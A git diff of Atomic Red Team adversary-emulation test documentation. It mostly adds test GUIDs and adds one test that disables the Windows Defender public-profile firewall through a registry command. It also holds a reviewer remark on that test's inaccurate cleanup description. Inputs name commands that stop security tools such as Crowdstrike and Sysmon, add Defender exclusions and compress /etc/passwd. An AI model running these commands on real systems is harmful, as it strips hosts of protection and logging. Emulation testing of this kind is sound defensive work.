+**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_path | Path that should be compressed into our output file | Path | %USERPROFILE%|
| file_extension | Extension of files to compress | String | .txt|
@@ -62,7 +66,7 @@ del /f /q /s #{output_file} >nul 2>&1
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```cmd
-if not exist "#{rar_exe}" (exit /b 1)
+if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -84,10 +88,14 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
+**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rar_installer | Winrar installer | Path | %TEMP%\winrar.exe|
| rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe|
@@ -111,7 +119,7 @@ dir
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```cmd
-if not exist "#{rar_exe}" (exit /b 1)
+if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -133,10 +141,14 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
+**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe|
| winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe|
@@ -162,7 +174,7 @@ dir
##### Description: Winzip must be installed
##### Check Prereq Commands:
```powershell
-cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
+cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
```
##### Get Prereq Commands:
```powershell
@@ -184,10 +196,14 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
+**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| 7zip_installer | 7zip installer | Path | %TEMP%\7zip.exe|
| 7zip_exe | Path to installed 7zip executable | Path | %ProgramFiles%\7-zip\7z.exe|
@@ -211,7 +227,7 @@ dir
##### Description: 7zip tool must be installed at specified location (#{7zip_exe})
##### Check Prereq Commands:
```cmd
-if not exist "#{7zip_exe}" (exit /b 1)
+if not exist "#{7zip_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -232,10 +248,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt|
| output_file | Path that should be output as a zip archive | Path | $HOME/data.zip|
@@ -259,7 +279,7 @@ rm -f #{output_file}
##### Description: Files to zip must exist (#{input_files})
##### Check Prereq Commands:
```sh
-if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
+if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -278,10 +298,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt|
| input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101|
@@ -312,10 +336,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME|
| output_file | File that should be output | Path | $HOME/data.tar.gz|
@@ -339,7 +367,7 @@ rm -f #{output_file}
##### Description: Folder to zip must exist (#{input_file_folder})
##### Check Prereq Commands:
```sh
-test -e #{input_file_folder}
+test -e #{input_file_folder}
```
##### Get Prereq Commands:
```sh
@@ -358,10 +386,14 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_folder | Path used to store files. | Path | /tmp/T1560|
| test_file | Temp file used to store encrypted data. | Path | T1560|
@@ -390,7 +422,7 @@ rm -Rf #{test_folder}
##### Description: gpg and zip are required to run the test.
##### Check Prereq Commands:
```sh
-if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
+if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md
index 4265891a..4f4895dc 100644
--- a/atomics/T1560.002/T1560.002.md
+++ b/atomics/T1560.002/T1560.002.md
@@ -23,10 +23,14 @@ Uses GZip from Python to compress files
**Supported Platforms:** Linux
+**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .gz file to be | Path | /tmp/passwd.gz|
@@ -50,7 +54,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
@@ -69,10 +73,14 @@ Uses bz2 from Python to compress files
**Supported Platforms:** Linux
+**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .bz2 file to be | Path | /tmp/passwd.bz2|
@@ -96,7 +104,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
@@ -115,10 +123,14 @@ Uses zipfile from Python to compress files
**Supported Platforms:** Linux
+**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .zip file to be | Path | /tmp/passwd.zip|
@@ -142,7 +154,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
@@ -161,10 +173,14 @@ Uses tarfile from Python to compress files
**Supported Platforms:** Linux
+**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
| path_to_output_file | Path of the file that you want your .tar.gz file to be | Path | /tmp/passwd.tar.gz|
@@ -188,7 +204,7 @@ rm #{path_to_output_file}
##### Description: Requires Python
##### Check Prereq Commands:
```bash
-which_python=`which python`; $which_python -V
+which_python=`which python`; $which_python -V
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md
index 4ef9d90f..2200cf0c 100644
--- a/atomics/T1560/T1560.md
+++ b/atomics/T1560/T1560.md
@@ -18,10 +18,14 @@ When the test completes you should find the files from the $env:USERPROFILE dire
**Supported Platforms:** Windows
+**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
| output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\T1560-data-ps.zip|
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index c3e7e8bc..ba2e2af9 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -61,10 +61,14 @@ Disables syslog collection
**Supported Platforms:** Linux
+**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command for linux. Default rpm | string | rpm -q rsyslog|
| package_installer | Package installer command for linux. Default yum | string | yum install -y rsyslog|
@@ -90,7 +94,7 @@ Disables syslog collection
##### Description: Package with rsyslog must be on system
##### Check Prereq Commands:
```sh
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```sh
@@ -109,6 +113,10 @@ Disable the Cb Response service
**Supported Platforms:** Linux
+**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
+
+
+
@@ -140,6 +148,10 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
+**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8
+
+
+
@@ -168,6 +180,10 @@ Stop and disable Crowdstrike Falcon on Linux
**Supported Platforms:** Linux
+**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d
+
+
+
@@ -198,6 +214,10 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
+**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
+
+
+
@@ -228,6 +248,10 @@ Disables LittleSnitch
**Supported Platforms:** macOS
+**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
+
+
+
@@ -256,6 +280,10 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
+**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849
+
+
+
@@ -284,6 +312,10 @@ Disables macOS Gatekeeper
**Supported Platforms:** macOS
+**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053
+
+
+
@@ -312,10 +344,14 @@ Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
**Supported Platforms:** macOS
+**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
@@ -349,10 +385,14 @@ run the prereq_command's and it should fail with an error of "sysmon filter must
**Supported Platforms:** Windows
+**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
@@ -378,7 +418,7 @@ sysmon -i -accepteula -i > nul 2>&1
##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
```powershell
-if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
+if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -389,7 +429,7 @@ Remove-Item $env:TEMP\Sysmon.zip -Force
##### Description: sysmon must be Installed
##### Check Prereq Commands:
```powershell
-if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
+if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -399,7 +439,7 @@ if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Window
##### Description: sysmon filter must be loaded
##### Check Prereq Commands:
```powershell
-if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
+if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -419,10 +459,14 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
+**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe|
@@ -445,7 +489,7 @@ sysmon -i -accepteula >nul 2>&1
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```powershell
-if(cmd /c where sysmon) {exit 0} else {exit 1}
+if(cmd /c where sysmon) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -458,7 +502,7 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```powershell
-if(cmd /c sc query sysmon) { exit 0} else { exit 1}
+if(cmd /c sc query sysmon) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -480,6 +524,10 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
+**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd
+
+
+
@@ -510,6 +558,10 @@ Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\"
**Supported Platforms:** Windows
+**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b
+
+
+
@@ -540,10 +592,14 @@ To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
**Supported Platforms:** Windows
+**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to stop | String | McAfeeDLPAgentService|
@@ -576,6 +632,10 @@ in Windows settings.
**Supported Platforms:** Windows
+**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7
+
+
+
@@ -612,6 +672,10 @@ will be displayed twice and the WinDefend service status will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2
+
+
+
@@ -644,6 +708,10 @@ grayed out and have no info.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
+
+
+
@@ -676,6 +744,10 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
**Supported Platforms:** Windows
+**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
+
+
+
@@ -715,6 +787,10 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
**Supported Platforms:** Windows
+**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
+
+
+
@@ -739,10 +815,14 @@ Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to t
**Supported Platforms:** Windows
+**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to remove | String | McAfeeDLPAgentService|
@@ -769,10 +849,14 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a
**Supported Platforms:** Windows
+**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe|
@@ -800,10 +884,14 @@ To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
**Supported Platforms:** Windows
+**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_folder | This folder will be excluded from scanning | String | C:\Temp|
@@ -837,10 +925,14 @@ To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtensi
**Supported Platforms:** Windows
+**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_exts | A list of extension to exclude from scanning | string | .exe|
@@ -874,10 +966,14 @@ To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess
**Supported Platforms:** Windows
+**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_process | A list of processes to exclude from scanning | string | outlook.exe|
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 1ca11b6f..213de5a4 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -26,10 +26,14 @@ Use the cleanup commands to restore some default auditpol settings (your origina
**Supported Platforms:** Windows
+**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
@@ -61,6 +65,10 @@ Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will ne
**Supported Platforms:** Windows
+**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd
+
+
+
@@ -98,6 +106,10 @@ Disables the windows audit policy to prevent key host based telemetry being writ
**Supported Platforms:** Windows
+**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
+
+
+
@@ -130,6 +142,10 @@ Clear the Windows audit policy using auditpol utility. This action would stop ce
**Supported Platforms:** Windows
+**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
+
+
+
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 5bce4173..d081df79 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -23,10 +23,14 @@ Disables history collection in shells
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
@@ -56,6 +60,10 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index ea17f6a6..27d556d3 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
- [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall)
-- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall)
+- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry)
-- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain)
+- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall)
-- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile)
+- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain)
-- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location)
+- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile)
+
+- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)
@@ -27,10 +29,14 @@ Disables the firewall
**Supported Platforms:** Linux
+**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| flavor_command | Command to disable firewall. Default firewalld. ufw (Ubuntu) command = ufw disable | String | systemctl stop firewalld ; systemctl disable firewalld|
| cleanup_command | Command to enable firewall. Default firewalld. ufw (Ubuntu) command = ufw enable | String | systemctl enable firewalld ; systemctl start firewalld|
@@ -62,6 +68,10 @@ Caution if you access remotely the host where the test runs! Especially with the
**Supported Platforms:** Windows
+**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f
+
+
+
@@ -84,13 +94,50 @@ netsh advfirewall set currentprofile state on >nul 2>&1
-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall
+## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry
+Disables the Microsoft Defender Firewall for the public profile via registry
+Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+
+
+
+## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall
Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
**Supported Platforms:** Windows
+**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1
+
+
+
@@ -114,7 +161,7 @@ netsh advfirewall reset >nul 2>&1
-## Atomic Test #4 - Opening ports for proxy - HARDRAIN
+## Atomic Test #5 - Opening ports for proxy - HARDRAIN
This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
@@ -122,6 +169,10 @@ reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536
**Supported Platforms:** Windows
+**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80
+
+
+
@@ -144,16 +195,20 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
-## Atomic Test #5 - Open a local port through Windows Firewall to any profile
+## Atomic Test #6 - Open a local port through Windows Firewall to any profile
This test will attempt to open a local port defined by input arguments to any profile
**Supported Platforms:** Windows
+**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_port | This is the local port you wish to test opening | integer | 3389|
@@ -177,16 +232,20 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location
+## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location
This test will attempt to allow an executable through the system firewall located in the Users directory
**Supported Platforms:** Windows
+**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_file_path | path to exe file | path | PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe|
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index e123cf1b..24eeec66 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -36,6 +36,19 @@ atomic_tests:
cleanup_command: |
netsh advfirewall set currentprofile state on >nul 2>&1
name: command_prompt
+- name: Disable Microsoft Defender Firewall via Registry
+ auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+ description: |
+ Disables the Microsoft Defender Firewall for the public profile via registry
+ Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+ cleanup_command: |
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+ name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
description: |
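Review bot: The new test's description says the cleanup "will re-enable firewall for the current profile", but both `command` and `cleanup_command` write only the `PublicProfile` key, so the cleanup restores the public profile and nothing else; the sentence appears to be carried over from the netsh-based test above it. Suggest `Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable the firewall for the public profile...`. The cleanup also unconditionally sets `EnableFirewall` to 1, which changes state on a host whose public-profile firewall was already off before the test, so the description should not imply that the original state is restored. Writing under `HKEY_LOCAL_MACHINE\SYSTEM` needs an elevated prompt, so the executor block should carry `elevation_required: true` alongside `name: command_prompt`, otherwise the `reg add` fails with access denied and the test never exercises the behavior it documents. Whether the firewall service picks up the registry change without a policy refresh is not something this diff shows, and the description might say so.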
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index 0671e974..1db3c799 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -21,10 +21,14 @@ Emulates modification of auditd configuration files
**Supported Platforms:** Linux
+**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
@@ -66,10 +70,14 @@ Emulates modification of syslog configuration.
**Supported Platforms:** Linux
+**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md
index 7db2e09b..51534980 100644
--- a/atomics/T1563.002/T1563.002.md
+++ b/atomics/T1563.002/T1563.002.md
@@ -17,10 +17,14 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
**Supported Platforms:** Windows
+**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Session_ID | The ID of the session to which you want to connect | String | 1337|
| Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55|
